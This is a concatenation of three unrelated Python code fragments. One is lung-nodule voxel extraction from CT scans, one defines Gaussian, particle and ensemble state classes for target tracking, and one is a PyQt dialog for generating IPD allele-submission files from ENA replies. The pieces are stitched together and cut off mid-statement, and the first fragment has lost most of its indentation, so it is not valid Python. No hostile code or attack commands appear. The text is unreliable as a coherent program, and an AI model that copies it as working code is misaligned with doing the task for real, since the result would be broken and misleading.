ax[0].imshow(voxel_stack[ii, 0, dim // 2],cmap=plt.cm.gray)
ax[1].imshow(vmask_stack[ii, 0, dim // 2],cmap=plt.cm.gray)
return voxel_stack, vmask_stack
def measure_voxels(labs, ims):
#print("Befpre measure.regionprops, labs & intensity shapes: ", labs.shape, ims.shape)
regprop = measure.regionprops(labs, intensity_image=ims) # probkem here on 20170327
voxel_volume = np.product(RESIZE_SPACING)
    areas = [rp.area for rp in regprop] # region sizes in voxel counts (the volumes in cubic mm are computed below)
volumes = [rp.area * voxel_volume for rp in regprop]
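    # Sphere-equivalent diameter: from V = (4/3)*pi*r^3 it follows that
    # d = 2*r = 2*(3V/(4*pi))**(1/3); the 0.3333 exponent below approximates the cube root.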
diameters = [2 * (3* volume / (4 * np.pi ))**0.3333 for volume in volumes]
labs_ids = [rp.label for rp in regprop]
#ls = [rp.label for rp in regprop]
max_val = np.max(areas)
max_index = areas.index(max_val)
max_label = regprop[max_index].label
bboxes = [r.bbox for r in regprop]
#max_ls = ls[max_index]
idl = labs == regprop[max_index].label # 400
nodules_pixels = ims[idl]
nodules_hu = pix_to_hu(nodules_pixels)
run_UNNEEDED_code = False
if run_UNNEEDED_code:
nodules_hu_reg = []
for rp in regprop:
idl = labs == rp.label
nodules_pixels = ims[idl]
nodules_hu = pix_to_hu(nodules_pixels)
nodules_hu_reg.append(nodules_hu) # NOTE some are out of interest, i.e. are equal all (or near all) to MAX_BOUND (400)
dfn = pd.DataFrame(
{
#"zcenter": zcenters,
#"ycenter": ycenters,
#"xcenter": xcenters,
"area": areas,
"diameter": diameters,
#"irreg_vol": irreg_vol,
#"irreg_shape": irreg_shape,
#"nodules_hu": nodules_hu_reg,
"bbox": bboxes
},
index=labs_ids)
return dfn
def find_voxels_and_blanks(dim, grid, images3, images3_seg, pmasks3, nodules_threshold=0.999, voxelscountmax = 1000, find_blanks_also = True, centralcutonly=True, diamin=2, diamax=10):
if np.sum(pmasks3) > 0:
centralcutonly = False # override centralcut for True nodule masks
zsel = dim // 2 if centralcutonly else range(0,dim)
pmav = pmasks3[:,0,zsel]
ims = images3[:,0,zsel] # selecting the zsel cut for nodules calc ...
ims_seg = images3_seg[:,0,zsel]
sstart = 0
send = images3.shape[0]
pms = pmav[sstart:send]
run_UNNEEDED_code = False
thresh = nodules_threshold # for testing , set it here and skip the loop
segment = 2 # for compatibility of the naming convention
for thresh in [nodules_threshold]: # jusst this one - keeping loop for a while
if find_blanks_also:
idx = np.abs(pms) > thresh
else:
idx = pms > thresh
idx.shape
nodls = np.zeros(pms.shape).astype(np.int16)
nodls[idx] = 1
nx = nodls[idx]
        volume = np.sum(nodls) # A check calculation ... counted as a count within hu_describe
nodules_pixels = ims[idx] # flat
nodules_hu = pix_to_hu(nodules_pixels)
part_name = ''.join([str(segment), '_', str(thresh)])
### DO NOT do them here
use_corrected_nodules = True # do it below from 20170311
if not use_corrected_nodules:
df = hu_describe(nodules_hu, uid=uid, part=part_name)
add_projections = False
if add_projections:
nodules_projections = []
for axis in range(3):
#sxm_projection = np.max(sxm, axis = axis)
nodls_projection = np.max(nodls, axis=axis)
naxis_name = ''.join(["naxis_", str(axis),"_", part_name])
if add_projections:
df[naxis_name] = np.sum(nodls_projection)
nodules_projections.append(nodls_projection)
voxels = []
vmasks = []
if not centralcutonly:
for k in range(idx.shape[0]):
if np.sum(idx[k]) > 0:
## find the nodules and take a cut
labs, labs_num = measure.label(idx[k], return_num = True, neighbors = 8 , background = 0) # label the nodules in 3d, allow for diagonal connectivity
dfn = measure_voxels(labs, ims[k])
nodules_count_0 = len(dfn)
## CUT out anything that is outside of the specified diam range
dfn = dfn[(dfn["diameter"] >= diamin) & ((dfn["diameter"] < diamax))] # CUT OUT anything that is less than 3 mm (essentially less than 7 voxels for 2x2x2
nodules_count = len(dfn) # 524 for file 1 of part 8 ..
max_nodules_count = voxelscountmax
n=0
for n in range(max_nodules_count):
                    if n < len(dfn): # use the nodule data, otherwise empty
bb = dfn.iloc[n]["bbox"]
zmin = bb[0]
zmax = bb[3]
zlen = bb[3] - bb[0]
ylen = bb[4] - bb[1]
xlen = bb[5] - bb[2]
xmin = np.max([bb[2] - np.max([(grid - xlen ) //2, 0]), 0]) ## do not go beyond 0/left side of the image
                        xmax = np.min([xmin + grid, ims.shape[-1]]) ## do not go beyond the right side
xmin = xmax - grid
if (xmax - xmin) != grid:
print ("ERROR in calculating the cut-offs ..., xmin, xmax =", xmin, xmax)
ymin = np.max([bb[1] - np.max([(grid - ylen ) //2, 0]), 0]) ## do not go beyond 0/left side of the image
                        ymax = np.min([ymin + grid, ims.shape[-2]]) ## do not go beyond the right side
ymin = ymax - grid
if (ymax - ymin) != grid:
print ("ERROR in calculating the cut-offs ..., ymin, ymax =", ymin, ymax)
                        # here simply take the entire voxel we have
#images3.shape
voxel = images3[k,:,:, ymin:ymax, xmin:xmax]
vmask = pmasks3[k,:,:, ymin:ymax, xmin:xmax]
voxels.append(voxel)
vmasks.append(vmask)
#voxel.shape
else:# essentially taking the central cuts of the blanks
## find the individual nodules ... as per the specified probabilities
labs, labs_num = measure.label(idx, return_num = True, neighbors = 8 , background = 0) # label the nodules in 3d, allow for diagonal connectivity
if labs_num > 0 and labs.shape[0] >1: # checking for height > 1 is needed as measure.regionprops fails when it is not, for instance for shape (1, 20, 20) we get ValueError: Label and intensity image must have the same shape.
#labs_num_to_store = 5
dfn = measure_voxels(labs, ims)
nodules_count = len(dfn) # 524 for file 1 of part 8 ..
max_nodules_count = voxelscountmax
n=0
for n in range(max_nodules_count):
                if n < len(dfn): # use the nodule data, otherwise empty
bb = dfn.iloc[n]["bbox"]
zmin = bb[0]
zmax = bb[3]
zlen = bb[3] - bb[0]
ylen = bb[4] - bb[1]
xlen = bb[5] - bb[2]
xmin = np.max([bb[2] - np.max([(grid - xlen ) //2, 0]), 0]) ## do not go beyond 0/left side of the image
                    xmax = np.min([xmin + grid, ims.shape[-1]]) ## do not go beyond the right side
xmin = xmax - grid
if (xmax - xmin) != grid:
print ("ERROR in calculating the cut-offs ..., xmin, xmax =", xmin, xmax)
ymin = np.max([bb[1] - np.max([(grid - ylen ) //2, 0]), 0]) ## do not go beyond 0/left side of the image
                    ymax = np.min([ymin + grid, ims.shape[-2]]) ## do not go beyond the right side
ymin = ymax - grid
if (ymax - ymin) != grid:
print ("ERROR in calculating the cut-offs ..., ymin, ymax =", ymin, ymax)
zmin_sel = zmin
zmax_sel = zmax
if centralcutonly: #include only one voxel representation
zmin_sel = zmin + zlen // 2
zmax_sel = zmin_sel + 1
iz=zmin_sel # for testing
for iz in range(zmin_sel,zmax_sel):
voxel = images3[iz,:,:, ymin:ymax, xmin:xmax]
vmask = pmasks3[iz,:,:, ymin:ymax, xmin:xmax]
voxels.append(voxel)
vmasks.append(vmask)
testPlot = False
if testPlot:
print ('scan '+str(iz))
f, ax = plt.subplots(1, 8, figsize=(24,3))
ax[0].imshow(nodls[iz,ymin:ymax, xmin:xmax],cmap=plt.cm.gray)
ax[1].imshow(ims[iz,ymin:ymax, xmin:xmax],cmap=plt.cm.gray)
ax[2].imshow(images3_amp[iz,0, dim//2, ymin:ymax, xmin:xmax],cmap=plt.cm.gray)
ax[3].imshow(voxel[0,dim//2],cmap=plt.cm.gray)
ax[4].imshow(voxel[0,dim],cmap=plt.cm.gray)
ax[5].imshow(voxel[0,dim+1],cmap=plt.cm.gray)
ax[6].imshow(voxel[0,dim+2],cmap=plt.cm.gray)
ax[7].imshow(voxel[0,dim+3],cmap=plt.cm.gray)
if len(voxels) > 0:
voxel_stack = np.stack(voxels)
vmask_stack = np.stack(vmasks)
else:
print_warning = False
if print_warning:
print("WARNING, find_voxels, not single voxel found even though expected")
voxel_stack = []
vmask_stack = []
#print("Nodules, voxels_aggregated: ", len(dfn), len(voxel_stack))
#np.savez_compressed(path_voxels_variant, voxel_stack)
testPlot = False
if testPlot:
print ('voxels count ', len(voxel_stack))
for ii in range(0,len(voxel_stack),len(voxel_stack)//10):
#plt.imshow(voxel_stack[ii,0,dim // 2], cmap=plt.cm.gray)
#plt.show()
f, ax = plt.subplots(1, 2, figsize=(6,3))
ax[0].imshow(voxel_stack[ii, 0, dim // 2],cmap=plt.cm.gray)
ax[1].imshow(vmask_stack[ii, 0, dim // 2],cmap=plt.cm.gray)
return voxel_stack, vmask_stack
def shuffle_scans_masks(scans, masks, seed):
np.random.seed(seed)
index_shuf = np.arange(len(scans))
np.random.shuffle(index_shuf)
scans = scans[index_shuf]
masks = masks[index_shuf]
return scans, masks
def create_unet_training_files (dim, recreate_grid8_March_data=True): # version with backward compatibility
grid8_March_data_str = "a" if recreate_grid8_March_data else "" # used for the the original data/approach
# the main procedure to create training files for the nodule identifier (consolidated version, with backward compatibility for grid 8)
create_main_grid = True
if create_main_grid:
diamins_2_10 = not recreate_grid8_March_data # backward compatible option
if diamins_2_10:
grids = [10, 20]
diamins = [2, | |
current_state
class GaussianState(State):
"""Gaussian State type
This is a simple Gaussian state object, which, as the name suggests,
is described by a Gaussian state distribution.
"""
covar: CovarianceMatrix = Property(doc='Covariance matrix of state.')
def __init__(self, state_vector, covar, *args, **kwargs):
# Don't cast away subtype of covar if not necessary
if not isinstance(covar, CovarianceMatrix):
covar = CovarianceMatrix(covar)
super().__init__(state_vector, covar, *args, **kwargs)
if self.state_vector.shape[0] != self.covar.shape[0]:
raise ValueError(
"state vector and covariance should have same dimensions")
@property
def mean(self):
"""The state mean, equivalent to state vector"""
return self.state_vector
class SqrtGaussianState(State):
"""A Gaussian State type where the covariance matrix is stored in a form :math:`W` such that
:math:`P = WW^T`
For :math:`P` in general, :math:`W` is not unique and the user may choose the form to their
taste. No checks are undertaken to ensure that a sensible square root form has been chosen.
"""
sqrt_covar: CovarianceMatrix = Property(doc="A square root form of the Gaussian covariance "
"matrix.")
def __init__(self, state_vector, sqrt_covar, *args, **kwargs):
sqrt_covar = CovarianceMatrix(sqrt_covar)
super().__init__(state_vector, sqrt_covar, *args, **kwargs)
@property
def mean(self):
"""The state mean, equivalent to state vector"""
return self.state_vector
@property
def covar(self):
"""The full covariance matrix.
Returns
-------
: :class:`~.CovarianceMatrix`
The covariance matrix calculated via :math:`W W^T`, where :math:`W` is a
:class:`~.SqrtCovarianceMatrix`
"""
return self.sqrt_covar @ self.sqrt_covar.T
GaussianState.register(SqrtGaussianState) # noqa: E305
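# Construction sketch (illustrative; assumes numpy is available as `np` in the caller):
#   P = np.array([[4., 1.], [1., 3.]])
#   W = np.linalg.cholesky(P)                    # one valid square-root form of P
#   state = SqrtGaussianState([[0.], [0.]], W)   # state.covar recovers W @ W.T == P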
class InformationState(State):
r"""Information State Type
The information state class carries the :attr:`state_vector`,
:math:`\mathbf{y}_k = Y_k \mathbf{x}_k` and the precision or information matrix
:math:`Y_k = P_k^{-1}`, where :math:`\mathbf{x}_k` and :math:`P_k` are the mean and
covariance, respectively, of a Gaussian state.
"""
precision: PrecisionMatrix = Property(doc='precision matrix of state.')
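    # Relation to a Gaussian state (illustrative sketch only; this class simply stores
    # y_k and Y_k directly, assuming numpy as `np` and some GaussianState `gaussian`):
    #   Y = np.linalg.inv(gaussian.covar)        # precision matrix, Y_k = P_k^{-1}
    #   y = Y @ gaussian.state_vector            # information state vector, y_k = Y_k x_k
    #   info = InformationState(y, precision=Y, timestamp=gaussian.timestamp)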
class WeightedGaussianState(GaussianState):
"""Weighted Gaussian State Type
Gaussian State object with an associated weight. Used as components
for a GaussianMixtureState.
"""
weight: Probability = Property(default=0, doc="Weight of the Gaussian State.")
@property
def gaussian_state(self):
"""The Gaussian state."""
return GaussianState(self.state_vector,
self.covar,
timestamp=self.timestamp)
@classmethod
def from_gaussian_state(cls, gaussian_state, *args, copy=True, **kwargs):
r"""
Returns a WeightedGaussianState instance based on the gaussian_state.
Parameters
----------
gaussian_state : :class:`~.GaussianState`
            The gaussian_state used to create the new WeightedGaussianState.
\*args : See main :class:`~.WeightedGaussianState`
args are passed to :class:`~.WeightedGaussianState` __init__()
copy : Boolean, optional
If True, the WeightedGaussianState is created with copies of the elements
of gaussian_state. The default is True.
\*\*kwargs : See main :class:`~.WeightedGaussianState`
kwargs are passed to :class:`~.WeightedGaussianState` __init__()
Returns
-------
:class:`~.WeightedGaussianState`
Instance of WeightedGaussianState.
"""
state_vector = gaussian_state.state_vector
covar = gaussian_state.covar
timestamp = gaussian_state.timestamp
if copy:
state_vector = state_vector.copy()
covar = covar.copy()
return cls(
state_vector=state_vector,
covar=covar,
timestamp=timestamp,
*args, **kwargs
)
class TaggedWeightedGaussianState(WeightedGaussianState):
"""Tagged Weighted Gaussian State Type
Gaussian State object with an associated weight and tag. Used as components
for a GaussianMixtureState.
"""
tag: str = Property(default=None, doc="Unique tag of the Gaussian State.")
BIRTH = 'birth'
'''Tag value used to signify birth component'''
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if self.tag is None:
self.tag = str(uuid.uuid4())
class ParticleState(State):
"""Particle State type
This is a particle state object which describes the state as a
distribution of particles"""
state_vector: StateVectors = Property(doc='State vectors.')
weight: MutableSequence[Probability] = Property(default=None, doc='Weights of particles')
parent: 'ParticleState' = Property(default=None, doc='Parent particles')
particle_list: MutableSequence[Particle] = Property(default=None,
doc='List of Particle objects')
fixed_covar: CovarianceMatrix = Property(default=None,
                                             doc='Fixed covariance value. Default `None`, where '
                                                 'weighted sample covariance is then used.')
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if (self.particle_list is not None) and \
(self.state_vector is not None or self.weight is not None):
raise ValueError("Use either a list of Particle objects or StateVectors and weights,"
" but not both.")
if self.particle_list and isinstance(self.particle_list, list):
self.state_vector = \
StateVectors([particle.state_vector for particle in self.particle_list])
self.weight = \
np.array([Probability(particle.weight) for particle in self.particle_list])
parent_list = [particle.parent for particle in self.particle_list]
if parent_list.count(None) == 0:
self.parent = ParticleState(None, particle_list=parent_list)
elif 0 < parent_list.count(None) < len(parent_list):
raise ValueError("Either all particles should have"
" parents or none of them should.")
if self.parent:
self.parent.parent = None # Removed to avoid using significant memory
if self.state_vector is not None and not isinstance(self.state_vector, StateVectors):
self.state_vector = StateVectors(self.state_vector)
if self.weight is not None and not isinstance(self.weight, np.ndarray):
self.weight = np.array(self.weight)
def __getitem__(self, item):
if self.parent:
p = self.parent[item]
else:
p = None
particle = Particle(state_vector=self.state_vector[:, item],
weight=self.weight[item],
parent=p)
return particle
@property
def particles(self):
return [particle for particle in self]
def __len__(self):
return self.state_vector.shape[1]
@property
def ndim(self):
return self.state_vector.shape[0]
@property
def mean(self):
"""The state mean, equivalent to state vector"""
result = np.average(self.state_vector,
axis=1,
weights=self.weight)
# Convert type as may have type of weights
return result
@property
def covar(self):
if self.fixed_covar is not None:
return self.fixed_covar
cov = np.cov(self.state_vector, ddof=0, aweights=np.array(self.weight))
# Fix one dimensional covariances being returned with zero dimension
return cov
State.register(ParticleState) # noqa: E305
class EnsembleState(Type):
r"""Ensemble State type
    This is an Ensemble state object which describes the system state as an
    ensemble of state vectors for use in Ensemble based filters.
This approach is functionally identical to the Particle state type except
it doesn't use any weighting for any of the "particles" or ensemble members.
All "particles" or state vectors in the ensemble are equally weighted.
.. math::
\mathbf{X} = [x_1, x_2, ..., x_M]
"""
state_vector: StateVectors = Property(doc="An ensemble of state vectors which represent the "
"state")
timestamp: datetime.datetime = Property(
default=None, doc="Timestamp of the state. Default None.")
@classmethod
def from_gaussian_state(self, gaussian_state, num_vectors):
"""
Returns an EnsembleState instance, from a given
GaussianState object.
Parameters
----------
gaussian_state : :class:`~.GaussianState`
The GaussianState used to create the new EnsembleState.
num_vectors : int
The number of desired column vectors present in the ensemble.
Returns
-------
:class:`~.EnsembleState`
Instance of EnsembleState.
"""
mean = gaussian_state.state_vector.reshape((gaussian_state.ndim,))
covar = gaussian_state.covar
timestamp = gaussian_state.timestamp
return EnsembleState(state_vector=self.generate_ensemble(mean, covar, num_vectors),
timestamp=timestamp)
@classmethod
def generate_ensemble(self, mean, covar, num_vectors):
"""
Returns a StateVectors wrapped ensemble of state vectors, from a given
mean and covariance matrix.
Parameters
----------
mean : :class:`~.numpy.ndarray`
The mean value of the distribution being sampled to generate
ensemble.
covar : :class:`~.numpy.ndarray`
The covariance matrix of the distribution being sampled to
generate ensemble.
num_vectors : int
The number of desired column vectors present in the ensemble,
or the number of "samples".
Returns
-------
:class:`~.EnsembleState`
Instance of EnsembleState.
"""
# This check is necessary, because the StateVector wrapper does
# funny things with dimension.
rng = np.random.default_rng()
if mean.ndim != 1:
mean = mean.reshape(len(mean))
try:
ensemble = StateVectors(
[StateVector((rng.multivariate_normal(mean, covar)))
for n in range(num_vectors)])
# If covar is univariate, then use the univariate noise generation function.
except ValueError:
ensemble = StateVectors(
[StateVector((rng.normal(mean, covar))) for n in range(num_vectors)])
return ensemble
@property
def ndim(self):
"""Number of dimensions in state vectors"""
return np.shape(self.state_vector)[0]
@property
def num_vectors(self):
"""Number of columns in state ensemble"""
return np.shape(self.state_vector)[1]
@property
def mean(self):
"""The state mean, numerically equivalent to state vector"""
return np.average(self.state_vector, axis=1)
@property
def covar(self):
"""Sample covariance matrix for ensemble"""
return np.cov(self.state_vector)
@property
def sqrt_covar(self):
"""sqrt of sample covariance matrix for ensemble, useful for
some EnKF algorithms"""
return ((self.state_vector-np.tile(self.mean, self.num_vectors))
/ np.sqrt(self.num_vectors - 1))
State.register(EnsembleState) # noqa: E305
class CategoricalState(State):
r"""CategoricalState type.
State object representing an object in a categorical state space. A state vector
:math:`\mathbf{\alpha}_t^i = P(\phi_t^i)` defines a categorical distribution over a finite set
of discrete categories :math:`\Phi = \{\phi^m|m\in \mathbf{N}, m\le M\}` for some finite
:math:`M`."""
categories: Sequence[float] = Property(doc="Category names. Defaults to a list of integers.",
default=None)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.state_vector = self.state_vector / np.sum(self.state_vector) # normalise state vector
if self.categories is None:
self.categories = list(map(str, range(self.ndim)))
if len(self.categories) != self.ndim:
raise ValueError(
f"ndim of {self.ndim} does not match number of categories {len(self.categories)}"
)
def __str__(self):
strings = [f"P({category}) = {p}"
for category, p in zip(self.categories, self.state_vector)]
string = ',\n'.join(strings)
return string
@property
def category(self):
"""Return the name of the most likely category."""
return self.categories[np.argmax(self.state_vector)]
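    # Example sketch (hypothetical values; the state vector is normalised on construction):
    #   cs = CategoricalState([[0.2], [0.3], [0.5]], categories=['car', 'bus', 'bike'])
    #   cs.category   # -> 'bike'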
class CompositeState(Type):
"""Composite state type.
A composition of ordered sub-states (:class:`State`) existing at the same timestamp,
representing an object with a state for (potentially) multiple, distinct state spaces.
"""
sub_states: Sequence[State] = Property(
doc="Sequence of sub-states comprising the composite state. All sub-states must have "
"matching timestamp. Must not be empty.")
default_timestamp: datetime.datetime = Property(
default=None,
doc="Default timestamp | |
= False
self.show()
ok, msg = settings_ok("IPD", self.settings, self.log)
if not ok:
QMessageBox.warning(self, "Missing IPD settings", msg)
self.close()
def define_sections(self):
"""defining the dialog's sections
"""
self.define_section1()
self.define_section2()
self.define_section3()
self.define_section4()
def define_section1(self):
"""defining section 1: choose project & ENA file
"""
mywidget = QWidget(self)
layout = QHBoxLayout()
mywidget.setLayout(layout)
proj_btn = QueryButton("Choose a (different) existing project",
"select project_name from projects where project_status = 'Open' order by project_name desc")
self.proj_widget = ChoiceSection("Project:", [proj_btn], self.tree, label_width=self.label_width)
if self.project:
self.proj_widget.field.setText(self.project)
proj_btn.change_to_normal(None)
layout.addWidget(self.proj_widget)
self.ok_btn1 = ProceedButton("Proceed", [self.proj_widget.field], self.log, 0)
layout.addWidget(self.ok_btn1)
self.proj_widget.choice.connect(self.ok_btn1.check_ready)
self.ok_btn1.proceed.connect(self.proceed_to2)
self.sections.append(("(1) Choose project:", mywidget))
def check_first_time_proceed(self):
"""checks if this is this user's first IPD submission;
if yes, asks for confirmation before proceeding
"""
if self.settings["modus"] == "staging":
return True
self.log.debug("Checking if this is your first IPD submission...")
query = "select submission_id from ipd_submissions where success = 'yes' limit 1"
success, data = db_internal.execute_query(query, 1, self.log, "Checking for previous IPD submissions",
"Database error", self)
if not success:
return False
if data:
return True
else: # first productive submission
self.log.info("First submission to IPD. Are you sure your settings are ok?")
msg = "This user has never before created IPD submission files.\n"
msg += "Before continuing, please check the 'methods' part of your settings:\n"
msg += "Do these accurately reflect the workflow applied to generate your samples?\n"
msg += "(See user manual under 'submission_ipd' for details.)\n\n"
msg += "Are you really sure your settings are ok?"
reply = QMessageBox.question(self, "First IPD submission",
msg, QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if reply == QMessageBox.Yes:
self.log.info("\t=> Proceed!")
return True
else:
self.log.info("\t=> I'll go check, wait here.")
return False
@pyqtSlot(int)
def proceed_to2(self, _):
"""proceed to next section
"""
self.log.debug("proceed_to_2")
proceed = self.check_first_time_proceed()
if not proceed:
self.ok_btn1.setChecked(False)
return
self.project = self.proj_widget.field.text()
proj_open = check_project_open(self.project, self.log, self)
if not proj_open:
msg = f"Project {self.project} is currently closed! You cannot create IPD-files from closed projects.\n"
msg += "To submit alleles of this project to IPD, please open its ProjectView "
msg += "and click the 'Reopen Project' button!"
msg += "\nAlternatively, please choose a different project."
self.log.warning(msg)
QMessageBox.warning(self, "This project is closed!", msg)
return
self.proceed_sections(0, 1)
def define_section2(self):
"""defining section 1: choose project & ENA file
"""
mywidget = QWidget(self)
layout = QGridLayout()
mywidget.setLayout(layout)
mypath = self.settings["raw_files_path"]
ENA_file_btn = FileButton("Upload email attachment from ENA reply", mypath, parent=self)
self.ENA_file_widget = ChoiceSection("ENA reply file:", [ENA_file_btn], self, label_width=self.label_width)
if self.settings["modus"] == "debugging":
self.ENA_file_widget.field.setText(
r"H:\Projekte\Bioinformatik\Typeloader\example files\both_new\KIR\invalid_ENA.txt")
ENA_file_btn.change_to_normal()
layout.addWidget(self.ENA_file_widget, 1, 0)
befund_file_btn = FileButton("Choose file with pretypings for each sample", mypath, parent=self)
self.befund_widget = ChoiceSection("Pretyping file:", [befund_file_btn], self, label_width=self.label_width)
self.befund_widget.setWhatsThis(
"Choose a file containing a list of previously identified alleles for all loci for each sample")
if self.settings["modus"] == "debugging":
self.befund_widget.field.setText(
r"H:\Projekte\Bioinformatik\Typeloader\example files\both_new\KIR\invalid_pretypings.csv")
befund_file_btn.change_to_normal()
layout.addWidget(self.befund_widget, 2, 0)
self.ok_btn2 = ProceedButton("Proceed", [self.ENA_file_widget.field, self.befund_widget.field], self.log, 0)
self.proj_widget.choice.connect(self.ok_btn2.check_ready)
self.befund_widget.choice.connect(self.ok_btn2.check_ready)
layout.addWidget(self.ok_btn2, 1, 1, 3, 1)
self.ok_btn2.proceed.connect(self.proceed_to3)
self.sections.append(("(2) Upload ENA reply file:", mywidget))
# add hidden button to create fake ENA response & fake pretyping file:
local_user, self.local_cf = check_local(self.settings, self.log)
if local_user: # only visible for LSL users
self.pretypings_btn = QPushButton("Generate pretyping file")
self.pretypings_btn.setStyleSheet(general.btn_style_local)
self.pretypings_btn.clicked.connect(self.get_pretypings)
layout.addWidget(self.pretypings_btn, 1, 1)
if check_nonproductive(self.settings): # only visible for non-productive LSL users
self.fake_btn = QPushButton("Generate fake input files")
self.fake_btn.setStyleSheet(general.btn_style_local)
self.fake_btn.clicked.connect(self.create_fake_input_files)
layout.addWidget(self.fake_btn, 0, 1)
@pyqtSlot()
def create_fake_input_files(self):
"""creates a fake ENA reply file & pretypinsg file
which can be used to create fake IPD files of any alleles in this project;
this functionality can be used to create IPD formatted files for alleles
that have not been submitted to ENA or have not received an ENA identifier, yet
"""
self.log.info("Creating fake ENA response file & fake pretypings file...")
try:
success, ena_file, pretypings_file = make_fake_ENA_file(self.project, self.log, self.settings, "local_name",
self)
        except Exception as E:
            self.log.exception(E)
            QMessageBox.warning(self, "Problem", "Could not generate fake files:\n\n{}".format(repr(E)))
            return  # bail out: ena_file & pretypings_file are undefined if the call raised
if success:
self.ENA_file_widget.field.setText(ena_file)
self.befund_widget.field.setText(pretypings_file)
self.fake_btn.setStyleSheet(general.btn_style_normal)
self.ok_btn2.check_ready()
else:
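            # on failure, make_fake_ENA_file apparently returns an error title & message in place of the file paths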
QMessageBox.warning(self, ena_file, pretypings_file)
@pyqtSlot()
def get_pretypings(self):
"""creates pretypings file from oracle database
"""
try:
success, pretypings_file, samples_not_found = get_pretypings_from_oracledb(self.project, self.local_cf,
self.settings, self.log, self)
except Exception as E:
self.log.exception(E)
QMessageBox.warning(self, "Error while generating pretypings file",
"Could not generate the pretypings file:\n\n{}".format(repr(E)))
success = False
if success:
if samples_not_found:
QMessageBox.information(self, "Not all pretypings found",
"Could not find pretypings for the following {} samples: \n- {}".format(
len(samples_not_found),
"\n-".join(samples_not_found)))
try:
suggested_path = os.path.join(self.settings["default_saving_dir"], "pretypings.csv")
chosen_path = \
QFileDialog.getSaveFileName(self, "Download generated pretypings file...", suggested_path)[0]
self.log.info("Saving generated pretypings file under {}...".format(chosen_path))
shutil.copy(pretypings_file, chosen_path)
self.befund_widget.field.setText(chosen_path)
self.pretypings_btn.setStyleSheet(general.btn_style_normal)
except Exception as E:
self.log.exception(E)
QMessageBox.warning(self, "Error while generating pretypings file",
"Could not save the pretypings file:\n\n{}".format(repr(E)))
self.pretypings_btn.setChecked(False)
self.ok_btn2.check_ready()
def parse_ENA_file(self):
"""parses the ENA reply file,
stores results and adjusts filter for IPDFileChoiceTable
"""
self.ENA_reply_file = self.ENA_file_widget.field.text().strip()
self.ENA_timestamp = general.get_file_creation_date(self.ENA_reply_file, self.settings, self.log)
self.ENA_id_map, self.ENA_gene_map = MIF.parse_email(self.ENA_reply_file)
key = "', '".join(sorted(self.ENA_id_map.keys()))
self.add_filter = " and alleles.local_name in ('{}')".format(key)
self.add_filter2 = " and alleles.cell_line_old in ('{}')".format(key)
@pyqtSlot(int)
def proceed_to3(self, _):
"""proceed to next section
"""
self.log.debug("proceed_to_3")
self.parse_ENA_file()
self.refresh_section3()
self.proceed_sections(1, 2)
def refresh_section3(self, keep_choices=False):
"""refreshes data in section3 after project has been changed
"""
self.log.debug("Refreshing section 3...")
self.project_info.fill_UI(self.project)
self.project_files.refresh(self.project, self.add_filter, self.add_filter2, keep_choices=keep_choices)
if not keep_choices:
if self.settings["modus"] == "debugging":
if self.project_files.check_dic: # if debugging, auto-select first file
self.project_files.check_dic[0].setChecked(True)
self.project_files.files_chosen.emit(1)
@pyqtSlot(str, str)
def catch_project_info(self, title, description):
"""catches title & description emitted by ProjectInfoTable
"""
self.title = title
self.description = description
def define_section3(self):
"""defining section 3: choose alleles
"""
self.log.debug("Setting up section3 of IPDSubmissionForm...")
mywidget = QWidget(self)
layout = QHBoxLayout()
mywidget.setLayout(layout)
mywidget.setMinimumHeight(250)
self.project_info = ProjectInfoTable(self.project, self.log, self)
self.project_info.setMaximumWidth(350)
self.project_info.setMinimumWidth(250)
layout.addWidget(self.project_info)
self.project_info.project_info.connect(self.catch_project_info)
self.project_files = IPDFileChoiceTable(self.project, self.log, self)
layout.addWidget(self.project_files)
self.project_files.files_chosen.connect(self.project_info.update_files_chosen)
self.project_files.files.connect(self.project_info.update_files)
self.project_files.old_cell_lines.connect(self.catch_cell_line)
self.project_files.additional_info.connect(self.catch_additional_info)
items = [self.project_info.item(3, 0)]
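        # the ProceedButton watches this ProjectInfoTable cell (presumably the count of chosen files) to decide readiness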
self.submit_btn = ProceedButton("Generate IPD files", items, self.log, 1, self)
self.submit_btn.proceed.connect(self.make_IPD_files)
self.submit_btn.setMinimumWidth(100)
layout.addWidget(self.submit_btn)
self.project_info.updated.connect(self.submit_btn.check_ready)
self.sections.append(("(3) Choose alleles to submit:", mywidget))
def get_chosen_samples(self):
"""gets results of file choice in section2,
stores them in self.samples
"""
self.samples = []
for i in self.project_files.check_dic:
box = self.project_files.check_dic[i]
if box.checkState():
sample = self.project_files.item(i, 2).text()
local_name = self.project_files.item(i, 3).text()
IPD_nr = self.project_files.item(i, 6).text()
self.samples.append((sample, local_name, IPD_nr))
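        # self.samples now holds one (sample_id_int, local_name, IPD_nr) tuple per checked row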
def get_values(self):
"""retrieves values for IPD file generation from GUI
"""
self.pretypings = self.befund_widget.field.text().strip()
self.log.debug("pretypings file: {}".format(self.pretypings))
self.project = self.proj_widget.field.text().strip()
self.curr_time = time.strftime("%Y%m%d%H%M%S")
self.subm_id = "IPD_{}".format(self.curr_time)
return True
def get_files(self):
"""retrieves ena_file and blast_xml for each chosen sample
"""
self.file_dic = {}
for (sample_id_int, local_name, _) in self.samples:
self.file_dic[local_name] = {}
query = """select blast_xml, ena_file from files
where sample_id_int = '{}' and local_name = '{}'""".format(sample_id_int, local_name)
success, data = db_internal.execute_query(query, 2, self.log,
"retrieving sample files", "Database error", self)
if success:
self.file_dic[local_name]["blast_xml"] = data[0][0]
self.file_dic[local_name]["ena_file"] = data[0][1]
@pyqtSlot(dict)
def catch_cell_line(self, old_cell_lines):
"""catches mapping between cell_line_old and loca_name
for files submitted to ENA under the old cell_line identifier
"""
if old_cell_lines:
self.log.debug(
"Caught mapping between {} old cell_line identifiers and allele names".format(len(old_cell_lines)))
for local_name in old_cell_lines:
cell_line_old = old_cell_lines[local_name]
self.ENA_id_map[local_name] = self.ENA_id_map[cell_line_old]
self.ENA_gene_map[local_name] = self.ENA_gene_map[cell_line_old]
@pyqtSlot(dict)
def catch_additional_info(self, allele_dic):
"""catches mapping between local_name and other info not displayed in the GUI
for use in befund-part of IPD file
"""
self.log.debug("Caught mapping between {} allele names and their addiditonal info".format(len(allele_dic)))
self.allele_dic = allele_dic # format: {local_name : TargetAllele}
@pyqtSlot()
def make_IPD_files(self):
"""tell typeloader to create the IPD file
"""
self.submit_btn.setChecked(False)
